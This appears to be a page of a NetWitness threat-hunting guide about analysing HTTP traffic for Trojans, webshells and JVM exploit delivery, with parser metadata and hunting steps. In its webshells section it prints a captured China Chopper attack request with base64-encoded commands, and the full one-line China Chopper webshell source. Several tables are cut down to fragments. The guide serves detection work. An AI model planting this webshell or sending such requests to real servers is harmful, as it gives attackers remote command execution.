NetWitness Hunting Guide - Page 3
Protocol Analysis: HTTP
The Hypertext Transfer Protocol (HTTP) is one of the most widely used protocols on the Internet. Even most SSL/TLS transmissions merely tunnel HTTP. Within any given dataset there will be an enormous number of HTTP sessions to analyze. The parsers and application rules in Live Content focus on the behavior and technical aspects of the protocol. By studying how HTTP communicates, and by analyzing both malware-generated and user-generated HTTP traffic, an analyst learns to quickly determine what is out of place in a dataset and what appears normal. Malware authors commonly try to blend in with regular network communications and appear as innocuous as possible. But by their very nature Trojans are programmatic and structured, and when examined it becomes clear that their communications hold no business value.
Be aware that many harmless, custom-built applications (stock ticker, weather, etc.) can resemble malware because they beacon for updates every X seconds or minutes. They often use “faked” HTTP headers in order to pass through network inspection devices (IDS/IPS) without alerting or being blocked.
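As a rough illustration of what "beacons every X seconds" looks like in data, the sketch below scores how regular the gaps between one client's requests are. The function name, the sample timestamps and the choice of the coefficient of variation are assumptions made for illustration; this is not NetWitness logic. A low score suggests mechanical traffic, but it cannot by itself separate a harmless ticker from a Trojan.

```python
from statistics import mean, pstdev

def beacon_regularity(timestamps):
    """Return the coefficient of variation of the gaps between requests.

    Values near 0 mean near-constant intervals (mechanical traffic);
    larger values mean irregular, more human-looking timing.
    Returns None when there are fewer than three requests.
    """
    ordered = sorted(timestamps)
    if len(ordered) < 3:
        return None
    gaps = [b - a for a, b in zip(ordered, ordered[1:])]
    avg = mean(gaps)
    if avg == 0:
        return 0.0
    return pstdev(gaps) / avg

# Hypothetical request times, in seconds since the start of capture.
ticker = [0, 60, 120, 181, 240, 300]   # polls roughly once a minute
browsing = [0, 2, 3, 45, 47, 300]      # bursts driven by a person

print(round(beacon_regularity(ticker), 3))
print(round(beacon_regularity(browsing), 3))
```

The ticker series scores far lower than the browsing series, which is the property an analyst would sort on before reviewing the sessions by hand.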
HTTP Structure
HTTP has many different versions still in common use, including 0.9, 1.0, 1.1, SPDY and the draft 2.0 proposal. Excluding SPDY and HTTP/2.0, the header request/response structure remains basically the same. The client begins with the Request Method, such as GET, POST or PUT, then a path and/or filename (with or without arguments if it is a web application), the HTTP version, and the first carriage return and line feed, which are 0x0D 0x0A in hexadecimal. Various HTTP headers follow. Each header name is terminated by a colon character (“:”), followed by zero to two spaces (0x20), then a value, and finally another carriage return and line feed before the next header. The HTTP daemon knows the header section is finished when it parses the double carriage return and line feed (0x0D 0x0A 0x0D 0x0A), which indicates that the next bytes are the body, if in fact there is a body at all. If there is a body, its length must be declared correctly, normally with a Content-Length header (HTTP/1.1 also permits Transfer-Encoding: chunked instead).
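The structure described above can be sketched as a small parser. This is a minimal illustration, not the NetWitness http.lua logic; the function name and the sample request are made up for the example, and the sketch handles only HTTP/1.x requests with a Content-Length body.

```python
def parse_request_head(raw: bytes):
    """Split a raw HTTP/1.x request into method, target, version, headers, body."""
    # The double CRLF (0x0D 0x0A 0x0D 0x0A) ends the header block.
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("header block is not terminated by CRLF CRLF")
    lines = head.split(b"\r\n")
    # Request line: Method, path (with any arguments), HTTP version.
    method, target, version = lines[0].decode("latin-1").split(" ", 2)
    headers = []  # a list keeps header order and duplicates intact
    for line in lines[1:]:
        name, colon, value = line.decode("latin-1").partition(":")
        if not colon:
            raise ValueError(f"malformed header line: {line!r}")
        headers.append((name, value.strip(" ")))  # drop the optional spaces
    return method, target, version, headers, body

# Hypothetical request used only to exercise the parser.
sample = (
    b"POST /submit.php?id=1 HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"Content-Length:5\r\n"
    b"\r\n"
    b"hello"
)
method, target, version, headers, body = parse_request_head(sample)
declared = int(dict(headers)["Content-Length"])
print(method, target, version)
print(headers)
print(declared == len(body))
```

Keeping the headers as an ordered list rather than a dictionary is deliberate: header order and spacing are themselves artifacts that can distinguish one client implementation from another.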
Figure 2. HTTP GET Structure outlines the basic structure of an HTTP GET Request and Response, while Figure 3. HTTP POST Structure outlines the basic structure of an HTTP POST Request and Response.


Figure 3. HTTP POST Structure
HTTP Methods
A Method, in the context of HTTP, is a verb. By definition, HTTP supports 9 Methods, with WebDAV (Web Distributed Authoring and Versioning) adding an additional 7 Methods. The most common Method in use is GET, which is roughly ten times as common as the POST Method. This is an important observation we will utilize later. For an analyst to understand what they are looking at in NetWitness, they must understand the HTTP Methods as well as the RFC-compliant structure of HTTP. The table below describes the common HTTP Methods.
- Method:
GET
- Description:
Retrieve specified resource
- Method:
POST
- Description:
Send a resource to the server in the body of the POST
- Method:
PUT
- Description:
Store a resource on the server, such as a file
- Method:
HEAD
- Description:
Retrieve specified resource but omit the body
- Method:
DELETE
- Description:
Delete a resource on the server
- Method:
TRACE
- Description:
Echoes the request back to the sender for proxy/MitM detection
- Method:
OPTIONS
- Description:
Request the server to indicate the supported Methods
- Method:
CONNECT
- Description:
Tunnel another protocol via HTTP
- Method:
PATCH
- Description:
Apply a partial modification to the specified resource
HTTP/1.1 made persistent connections the default and introduced a feature known as pipelining. Earlier versions of HTTP would start a new TCP session for every resource requested from the server. With modern web applications, this could have kicked off hundreds if not thousands of TCP sessions per page view. A persistent connection allows the same TCP session to be reused for as long as the connection is maintained, and pipelining lets the client send further requests on it without waiting for each response. This is why, within HTTP/1.1 sessions, an analyst can see GET and POST Methods in a single session, and potentially multiple files and forensic fingerprints. Most malware authors prefer a quick beacon and check-in with their C2 infrastructure rather than a constant connection that is always alive. The individual HTTP headers, which together comprise the HTTP header block, are typically limited by the server to a total of 4-8 KB per Request, which is generally not enough data for effective bidirectional communications. This is the behavioral aspect of malware we are looking for. To send data via HTTP, many Trojans utilize the HTTP POST Method and do not bother with handling pipelined requests. With this in mind, the rules below help separate the interactive type of HTTP sessions from the mechanical ones.
Note: the following metadata are now in the HTTP Lua parser. These keys are not populated until the advanced feature is enabled in the HTTP_lua_options file by changing the return value from "false" to "true". For details, see the HTTP Lua Parser Options topic.
- Service Characteristics Metadata:
http post no get
- Description:
Sessions with only HTTP POST Methods
- Service Characteristics Metadata:
http get no post
- Description:
Sessions with only HTTP GET Methods
- Service Characteristics Metadata:
http post and get
- Description:
Sessions with HTTP GET and POST Methods
- Service Characteristics Metadata:
http connect
- Description:
Sessions with only HTTP CONNECT Methods
- Service Characteristics Metadata:
post no get no referer
- Description:
A POST only session with no referrer
- Service Characteristics Metadata:
post no get no referrer directotoip
- Description:
A POST only session with no referrer direct to an IP address, not a domain name
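The table above can be read as a small decision procedure over the Methods seen in one session. The sketch below is an approximation written for illustration, not the parser's actual implementation: the function names are hypothetical, the label strings are copied verbatim from the table, and "POST only" is assumed to mean "at least one POST and no GET".

```python
import ipaddress

def is_ip_literal(host):
    """True when the Host value is an IP address rather than a domain name."""
    if host.count(":") == 1:  # drop an IPv4 ":port" suffix
        host = host.split(":")[0]
    try:
        ipaddress.ip_address(host.strip("[]"))
        return True
    except ValueError:
        return False

def classify_methods(methods, referer=None, host=None):
    """Map the request Methods seen in one session to the table's labels."""
    seen = {m.upper() for m in methods}
    has_get, has_post = "GET" in seen, "POST" in seen
    labels = []
    if has_post and has_get:
        labels.append("http post and get")
    elif has_post:
        # Assumption: "POST only" means POST present and GET absent.
        labels.append("http post no get")
        if not referer:
            labels.append("post no get no referer")
            if host and is_ip_literal(host):
                # Label text copied verbatim from the table above.
                labels.append("post no get no referrer directotoip")
    elif has_get:
        labels.append("http get no post")
    if seen == {"CONNECT"}:
        labels.append("http connect")
    return labels

print(classify_methods(["GET", "GET", "POST"]))
print(classify_methods(["POST"], referer=None, host="203.0.113.7"))
```

The nested checks mirror how the labels narrow: every "direct to IP" session is also a "no referer" session, which is also a "post no get" session, so an analyst can pivot from the broadest bucket to the most suspicious one.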
Webshells are defined as executable code on a web server that allows attackers to remotely execute commands. They can be executable files placed in a directory within the configured webroot and can be written in any language that the HTTP daemon is configured to execute. They can even be legitimate scripts installed as part of a web application that has vulnerabilities that allow an attacker to execute system commands. RSA has observed Trojanized DLLs that replace system DLLs to accomplish webshell functionality, as well as modified scripts that are part of a legitimate web application. Webshells can be configured to use any of the HTTP Methods to execute commands, and the commands themselves can be in HTTP headers, the URL or the body of a POST Method, among others. Webshells can range in size from a single line to thousands of lines of code. They are difficult to detect when not in use and have been found in nearly every incident RSA has worked in the past 2 years.
Many popular webshells utilize the HTTP POST Method to send code to a stub that executes the code in the body of the POST. One example of this is the China Chopper webshell. The data to be evaluated by the script is in the body of the request. Signature-based detection in these cases is either extremely hard or too loose and prone to a high number of false positives: the payload can change with each command, and anything that is fixed is normally common to a lot of other traffic. The connections in these cases are not kept alive; each is torn down and a new one is established when a new command is issued. Searching for direction = inbound and analysis.service = http post no get would be a good start at detecting this type of behavior, if the traffic is unencrypted. Below is an example of such a request.
- Column 1:
POST /ftpadmin.aspx HTTP/1.1
Cache-Control: no-cache
X-Forwarded-For: 248.192.237.178
Referer: http://ftp.example.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: ftp.example.com
Content-Length: 1091
Connection: Close

cookie=Response.Write("->|");var err:Exception;try{eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String("←SNIP→k7")),"unsafe");}catch(err){Response.Write("ERROR:// "%2Berr.message);}Response.Write("|<-");Response.End();&z1=Y21k&z2=Y2QgL2QgIkM6XGluZXRwdWJcd3d3cm9vdFwiJndob2FtaSAvYWxsJmVjaG8gW1NdJmNkJmVjaG8gW0Vd
Figure 4. China Chopper Webshell Network Traffic Utilizing the POST Method
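The z1 and z2 parameters at the end of the request in Figure 4 are plain base64, so an analyst can recover the command the operator issued. The sketch below decodes only those two values as they appear in the figure; the elided "cookie" value is left out, and the helper name is an assumption for the example. Code page 936 is used for the text decoding because the webshell stub itself calls GetEncoding(936).

```python
import base64
from urllib.parse import parse_qs

# z1 and z2 exactly as shown in Figure 4 (z2 is wrapped across two lines there).
body_tail = (
    "z1=Y21k&"
    "z2=Y2QgL2QgIkM6XGluZXRwdWJcd3d3cm9vdFwiJndob2FtaSAv"
    "YWxsJmVjaG8gW1NdJmNkJmVjaG8gW0Vd"
)

def decode_params(form_body, encoding="cp936"):
    """Base64-decode every parameter of a form-encoded body."""
    params = parse_qs(form_body)
    return {
        name: base64.b64decode(values[0]).decode(encoding)
        for name, values in params.items()
    }

decoded = decode_params(body_tail)
for name, value in decoded.items():
    print(name, "=", value)
```

Here z1 names the interpreter and z2 carries the command line: a change into the webroot, a whoami /all, and echo markers that bracket the output.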
- Column 1:
<%@ Page Language="Jscript"%><%eval(Request.Item["cookie"],"unsafe");%>
Figure 5. Contents of China Chopper Webshell ftpadmin.aspx
HTTP Headers
The http.lua parser is responsible for analyzing the HTTP service. It is configurable for more verbose parsing by modifying the http_lua_options.lua file. These options include:
- Manipulating the full URL
- Registering the X-Forwarded-For HTTP header
- Parsing and registering the HTTP Referrer path
- Parsing the HTTP Header User-Agent into its own meta key
- Resolving HTTP Response Codes into friendly names
- Verbosely parsing HTTP headers and their unique values
- Fingerprinting browsers based on HTTP Header order
Figure 6. MSU Trojan Beacon
Figure 7. MSU_rat Lua parser to detect MSU Variant
If the MSU_rat Lua parser did not exist, you could quickly write an application rule and push it out enterprise wide within minutes instead of the hours or days it would take to write a full detection parser and test it for efficacy. In this particular case, there were several variants of this Trojan in the environment, all beaconing to different domains. Having the HTTP protocol analyzed to this granularity allowed the analysts to quickly turn around and detect the additional Trojans in a trivial amount of time.
This represents an example of creating an indicator of compromise based purely on existing metadata. This is not the equivalent of a signature in the traditional IDS/IPS sense, and still requires an analyst to review the data to determine if the traffic is legitimate or illegitimate. With all the traffic available, the analyst was then able to reconstruct the actions conducted by the actor. This is a key differentiator between NetWitness and common IDS/IDP, and is not possible with the latter, as they only work forward from the point in time when ‘signatures’ are applied to the device and then match on the pattern.
User-Agent
HTTP Trojans try to blend in with normal HTTP traffic by emulating what they think is ‘normal’. A User-Agent is an application identifier for active web applications. They will generally tell you the Operating System and installed extensions for that browser, in the case of Internet Explorer. Trojans are either hard-coded with a User-Agent, or read the User-Agent from the Windows Registry. A popular User-Agent used by malware is displayed below.
Figure 8. User-Agent Example
This User-Agent shows that the Operating System is Windows XP 32 bit with Internet Explorer 6.0 running Service Pack 2 with Security Center Version 1. This Service Pack was released in 2004.
It is highly unlikely that an actual user is browsing with a 12 year old Operating System and browser. Applications that generate web requests with this User-Agent are very probably not human driven and represent some sort of automated request. The http.lua parser can be configured to register meta in a key of your choice; by default it will register meta to the client key. The logic below is applied in order to categorize User-Agents. This type of logic is present throughout the Live Content in an attempt to segment the interesting traffic by protocol and behavioral artifacts.
[Table: Service Characteristics Metadata / Description. Rows not recoverable; surviving fragment: "4.0 or 5.0".]
Hostname Alias
DNS and domain names are often called the backbone of the internet. They resolve friendly names like rsa.com to IP addresses that are understood by the layer 3 routing infrastructure. They are also used for malicious purposes, such as pointing a Trojan at C2, port calculation, and signaling an action. When using the metadata already discussed to organize your dataset into manageable buckets of behavior, the analyst should generally turn to the alias.host report in NetWitness to begin triaging behavior.
Analysts should look for misspelled names like ‘go0gle.com’ as well as nonsense domains like ‘jhkhajdsfgasdkfhk.info’ as well as seemingly innocuous names like ‘australiantestnew233s.info’. We recommend that you extract these domains, then run them through online tools like Virustotal, Robtex or Bulk SEO Tools, and look for recent registration dates or obviously fake registrant information. With that in mind, Live content has logic built in to identify suspicious domains and allow the analyst to carve through the dataset by reducing the amount of data they are analyzing at a given time.
[Table: Service Characteristics Metadata / Description. Rows not recoverable; surviving fragments: "apple, and so on, but do not end with .google.com or .apple.com"; "or two groups of four consecutive consonants or numerals, useful for discovering a DGA (domain generation algorithm)."; "e.g. host: 10.0.0.1"; "org or net".]
The Java Virtual Machine [JVM]
The Java Virtual Machine, or JVM, has been the target of considerable vulnerability research and remains a favorite vector for delivering malware. Even with the improvements in security that Oracle has been building into the latest versions, many organizations are stuck with years-old implementations because of unsupported applications the business still relies on. This allows cyber criminals an avenue of approach that is rarely locked down.
For our purposes, we’ll analyze the behavior of three main components involved in exploit and malware delivery. We are interested in the JAR (Java ARchive), the Java Class and the Java Applet. An applet is usually a small script that runs in the context of the browser. Exploit Applets generally reference a JAR or Class file using specific launch properties, such as a decoding key or another special parameter set by the applet. Two examples are operating system and Java version; these are typically used to profile and deliver the proper exploit. This is where the JVM takes over to retrieve these Class or JAR files and launch them with the parameters specified by the applet. An interesting artifact of the JVM is that by default, its User-Agent is the version of Java completing the request.
[Figure 9 request headers not recoverable; surviving fragments: "gzip"; "image/gif, image/jpeg, *; q=.2, */*; q=.2".]
Figure 9. Example JVM Request for Exploit JAR
Armed with this indicator we can construct a few rules to help narrow down only the JVM activity reaching the internet for a period of time. The following table highlights metadata that is relevant to the JVM.
[Table: metadata relevant to the JVM. Rows not recoverable.]
All JVM and GET Method requests to the Internet should be analyzed. Many times, the malware being delivered isn’t encoded and the request after the JAR or Class file will be an executable. You can find this metadata in Forensic Fingerprint. The RSA Research team finds that opening up alias.host and tld allows us to quickly scan the domains involved to look for ones that are out of the ordinary. Not all payloads from JVM exploits come down in the clear. The exploit JAR could have code within it to unpack the payload after downloading it from the server. If these sessions are encoded with anything but a single byte XOR key, the forensic fingerprint parsers will not detect the executable; it will simply be a ‘blob’ of binary data. This is a key indicator for analyzing Java traffic; if you cannot identify the payload after a small JAR or Class file comes down, it might be time to dig deeper into the JAR or simply examine the payload for encoding schemes.
In the example below, an exploit payload was delivered with a simple XOR encoding scheme. The JAR used a DWORD XOR key for the entire payload and was therefore not natively identified by NetWitness. A parser, in theory, could be used to detect these. However, as you add to the key length
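The DWORD XOR scheme mentioned above can be sketched in a few lines. This is an illustration only: the key, the sample bytes and the function names are hypothetical, and the key recovery assumes the decoded payload is a Windows executable whose first four bytes are the common "MZ\x90\x00" prefix, which is typical but not guaranteed.

```python
from itertools import cycle

def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key; the same call encodes and decodes."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))

def recover_key(encoded: bytes, known_prefix: bytes, key_len: int = 4) -> bytes:
    """Recover a repeating XOR key from known leading plaintext bytes."""
    if len(known_prefix) < key_len or len(encoded) < key_len:
        raise ValueError("need at least key_len bytes of known plaintext")
    return xor_bytes(encoded[:key_len], known_prefix[:key_len])

# Hypothetical 4-byte (DWORD) key and a stand-in for the start of a PE file.
key = bytes.fromhex("a1b2c3d4")
plain = b"MZ\x90\x00\x03\x00\x00\x00" + b"This program cannot be run in DOS mode."
encoded = xor_bytes(plain, key)

# Assumption: the payload begins with the usual "MZ\x90\x00" bytes.
guess = recover_key(encoded, b"MZ\x90\x00")
decoded = xor_bytes(encoded, guess)
print(guess.hex())
print(decoded[:2])
```

The recovery step needs as many known plaintext bytes as the key is long, so each extra key byte demands more certainty about what the start of the payload looks like.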
Figure 10. Encoded Payload
Figure 11. Decoded Payload
It is not always as easy as this example to extract the payload. Often the JAR’s individual Class files have to be de-compiled and examined, possibly debugged and modified to discover the encoding or encryption algorithm used. Malware writers have even used a nonce exchange to generate a one-time key which is used to encode and deliver then decode and execute the malware. This is yet another reason full packet capture is a must for any serious analyst or researcher.
Other HTTP Indicators
There are a myriad of indicators, behavior and technical aspects of HTTP that can be combined to find malicious software. The Live content parsers put together some of the most common indicators of compromise [IOC] in an intelligent fashion for the analyst automatically. This is not the definitive list of IOCs to be used for hunting in the HTTP dataset, but it offers a starting point for an investigation.
The http with base64 and http with binary logic deserve special mention. This is a common technique to obfuscate data being sent back to a C2 in order to appear more like normal HTTP traffic. Base64 data can be quickly decoded to discover what is inside: oftentimes binary data. If the data contained within these sessions does not decode properly, it could be because of a custom base64 alphabet, which will be present and defined within the Trojan. Similarly, the binary data, unless it is a simple single- or multi-byte XOR
[Table: Service Characteristics Metadata / Description. Rows not recoverable; surviving fragments: "JARs, etc"; ".php, .zip, etc"; "not a hostname, that queries for a single character PHP script".]
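When base64 data does not decode cleanly, the custom-alphabet case mentioned above can be handled by translating the Trojan's alphabet back to the standard one before decoding. The sketch below is a minimal illustration: the helper names, the sample data and the custom alphabet (the standard alphabet with upper and lower case swapped) are all hypothetical, and in practice the alphabet has to be recovered from the malware sample itself.

```python
import base64

STANDARD = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

def b64decode_custom(data: str, alphabet: str) -> bytes:
    """Decode base64 text that was produced with a non-standard alphabet."""
    if len(alphabet) != 64 or len(set(alphabet)) != 64:
        raise ValueError("alphabet must contain 64 distinct characters")
    # Map each custom character to its standard counterpart, then decode.
    return base64.b64decode(data.translate(str.maketrans(alphabet, STANDARD)))

def b64encode_custom(raw: bytes, alphabet: str) -> str:
    """Encode the way such a Trojan would, for testing the decoder."""
    text = base64.b64encode(raw).decode("ascii")
    return text.translate(str.maketrans(STANDARD, alphabet))

# Hypothetical alphabet and beacon content.
CUSTOM = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/"
secret = b"id=1234&host=WKSTN01"
token = b64encode_custom(secret, CUSTOM)

print(token)
print(b64decode_custom(token, CUSTOM))
```

Decoding the same token with the standard alphabet yields different bytes rather than an error, which is why output that looks like noise is itself a hint to go looking for an alphabet inside the binary.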
Figure 12. HTTP with Base64 Encoded Data in Body
Figure 13. HTTP with Binary Data in Payload
Putting it All Together and Hunting in HTTP
Figure 14. NetWitness Hunting Theory
Time Period
The first step to hunting in NetWitness is possibly the most important step. Before we start drilling through the different meta categories, an analyst must first answer a question: "What time period am I looking at?" The analyst must also be aware that unlike most traditional forensics tools, NetWitness is always capturing data, and delivers results in near real-time. If we were to choose the default value of last 24 hours and happened to refresh our browser, the time offsets for that last 24 hours would change. For example
Directionality
The next concept is directionality. What type of threats are we looking for and which direction would we look for these connections? If we are looking for Trojan C2 communications, we assume they are inside the network and connecting to an external resource; so we choose the direction outbound. If we are looking for webshell activity and have properly set up our traffic_flow_options.lua, we choose the direction inbound. Lastly, if we are looking for some sort of internal relay to defeat firewall policy or access from a compromised DMZ machine, we choose the direction lateral.
Choose a Service
Now that we have selected an absolute time offset and chosen our direction, we can choose the service to be analyzed, in this case HTTP or service = 80. We have now narrowed down our dataset to just the pertinent data and can begin our actual analysis.
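The three narrowing steps above (time period, directionality, service) amount to a filter over session records. The sketch below shows that idea outside of NetWitness; the session dictionaries, field names, dates and hostnames are hypothetical stand-ins for session metadata, not the product's query syntax.

```python
from datetime import datetime, timezone

def in_scope(session, start, end, direction, service):
    """Apply the three narrowing steps: time window, direction, service."""
    return (
        start <= session["time"] < end
        and session["direction"] == direction
        and session["service"] == service
    )

# An absolute window stays put when the view is refreshed,
# unlike a relative "last 24 hours" window.
start = datetime(2016, 3, 1, tzinfo=timezone.utc)
end = datetime(2016, 3, 2, tzinfo=timezone.utc)

def at(day, hour, minute):
    return datetime(2016, 3, day, hour, minute, tzinfo=timezone.utc)

sessions = [
    {"time": at(1, 9, 15), "direction": "outbound", "service": 80, "alias_host": "www.example.com"},
    {"time": at(1, 9, 16), "direction": "inbound", "service": 80, "alias_host": "ftp.example.com"},
    {"time": at(1, 9, 17), "direction": "outbound", "service": 53, "alias_host": "example.net"},
    {"time": at(3, 1, 0), "direction": "outbound", "service": 80, "alias_host": "example.org"},
]

c2_candidates = [s for s in sessions if in_scope(s, start, end, "outbound", 80)]
webshell_candidates = [s for s in sessions if in_scope(s, start, end, "inbound", 80)]
print([s["alias_host"] for s in c2_candidates])
print([s["alias_host"] for s in webshell_candidates])
```

Only the direction changes between the two hunts; the time window and service stay fixed, which keeps the two result sets comparable.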